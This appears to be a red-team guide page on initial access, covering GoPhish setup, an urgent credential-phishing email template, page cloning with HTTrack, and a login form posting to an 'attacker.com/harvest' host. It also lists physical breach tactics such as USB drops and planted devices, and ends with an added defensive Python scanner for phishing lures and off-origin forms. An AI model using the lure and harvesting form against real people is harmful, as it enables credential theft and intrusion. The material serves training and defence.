Initial Access Operations
Phase 1
Initial access is the first foothold in a target environment. Red teams use phishing, physical breaches, supply chain compromise, or perimeter exploitation to establish their first C2 beacon.
Phishing Campaigns
```bash
# GoPhish - Open-source phishing framework
docker run -d -p 3333:3333 --name gophish gophish/gophish
# Access at https://localhost:3333
# Default: admin:gophish
```

Email template example (credential harvesting):

```
Subject: [URGENT] Security Alert - Verify Your Account

Dear {FirstName},

We detected suspicious activity on your account. Please verify your identity immediately:

https://login-portal.company-domain[.]com/verify?token={RId}

This link expires in 24 hours. Failure to verify will result in account suspension.

IT Security Team
```

Landing page: clone the legitimate login page with HTTrack (or clone it manually):

```bash
httrack https://login.company.com -O /tmp/clone
```

Then add a credential capture form whose submission goes to the attacker server:

```html
<form action="https://attacker.com/harvest" method="POST">
  <input name="username" placeholder="Email">
  <input type="password" name="password" placeholder="Password">
  <button type="submit">Sign In</button>
</form>
```

Physical Breach Tactics
- Tailgating: Follow authorized personnel through secure doors
- USB Drops: Leave malicious USB drives in parking lot/lobby (labeled "Executive Salaries 2025")
- Rogue Device: Plant Raspberry Pi with 4G modem for persistent network access
- Social Engineering: Impersonate IT support, delivery personnel, or contractors
Physical Safety First
Never compromise personal safety during physical breaches. If confronted by security, immediately identify yourself as a red teamer and produce authorization documentation.
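Added defender-side example (not part of the original page, and not code from GoPhish or HTTrack): a small Python scanner that scores a message like the phishing template above for urgency phrasing and lookalike link domains, and inspects a cloned login page for forms whose action submits to a different registrable domain than the page itself, which is exactly the artefact the harvesting form leaves behind. The trusted-domain list, the sample email, the `attacker.example` host and the two-label domain heuristic are constructed assumptions for the demo.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample inputs (mirroring the template and form shown above, with
# placeholders filled in by the demo, not taken from a real campaign).
SAMPLE_EMAIL = """Subject: [URGENT] Security Alert - Verify Your Account
Dear Alice,
We detected suspicious activity on your account. Please verify your identity immediately:
https://login-portal.company-domain.com/verify?token=abc123
This link expires in 24 hours. Failure to verify will result in account suspension.
IT Security Team
"""

SAMPLE_PAGE_URL = "https://login-portal.company-domain.com/verify"
SAMPLE_PAGE_HTML = """<form action="https://attacker.example/harvest" method="POST">
<input name="username" placeholder="Email">
<input type="password" name="password" placeholder="Password">
<button type="submit">Sign In</button>
</form>"""

# Hypothetical allow-list: hosts the organisation legitimately sends login links from.
TRUSTED_DOMAINS = {"company.com", "login.company.com"}

# Pressure language typical of credential-harvesting lures.
URGENCY_PHRASES = [
    "urgent", "verify your account", "immediately", "expires in",
    "account suspension", "suspicious activity",
]

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def registrable_domain(host):
    """Crude eTLD+1: the last two labels. Adequate for .com-style hosts in this demo;
    a real deployment would use the Public Suffix List."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def is_lookalike(host, trusted):
    """True when the host is not on the allow-list but embeds a trusted brand label
    (e.g. 'company' inside 'company-domain.com')."""
    trusted_regs = {registrable_domain(t) for t in trusted}
    if registrable_domain(host) in trusted_regs:
        return False
    brands = {r.split(".")[0] for r in trusted_regs}
    return any(b in host.lower() for b in brands)


def score_email(body, trusted=TRUSTED_DOMAINS):
    """Return (score, findings) for a message body; each indicator adds one point."""
    findings = []
    lowered = body.lower()
    for phrase in URGENCY_PHRASES:
        if phrase in lowered:
            findings.append(f"urgency phrase: {phrase!r}")
    trusted_regs = {registrable_domain(t) for t in trusted}
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname or ""
        if registrable_domain(host) in trusted_regs:
            continue
        if is_lookalike(host, trusted):
            findings.append(f"lookalike domain: {host}")
        else:
            findings.append(f"untrusted link host: {host}")
    return len(findings), findings


class _FormActions(HTMLParser):
    """Collect the action attribute of every <form> in a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            self.actions.append(dict(attrs).get("action") or "")


def off_origin_forms(page_url, html):
    """Return form actions that post to a different registrable domain than the page.
    Relative actions (no host) are treated as same-origin and skipped."""
    parser = _FormActions()
    parser.feed(html)
    page_reg = registrable_domain(urlparse(page_url).hostname or "")
    suspicious = []
    for action in parser.actions:
        host = urlparse(action).hostname
        if host and registrable_domain(host) != page_reg:
            suspicious.append(action)
    return suspicious


if __name__ == "__main__":
    score, details = score_email(SAMPLE_EMAIL)
    print(f"email score={score}")
    for d in details:
        print("  -", d)
    print("off-origin forms:", off_origin_forms(SAMPLE_PAGE_URL, SAMPLE_PAGE_HTML))
```

Run against the sample message the scanner reports every urgency phrase from the lure plus the lookalike domain, and the cloned page check isolates the single form posting to the harvesting host; a page that keeps a relative `action="/login"` produces no finding, which is the behaviour you want when scanning a legitimate portal. Both checks are heuristics meant to feed a mail gateway rule or a brand-monitoring job, not a verdict on their own.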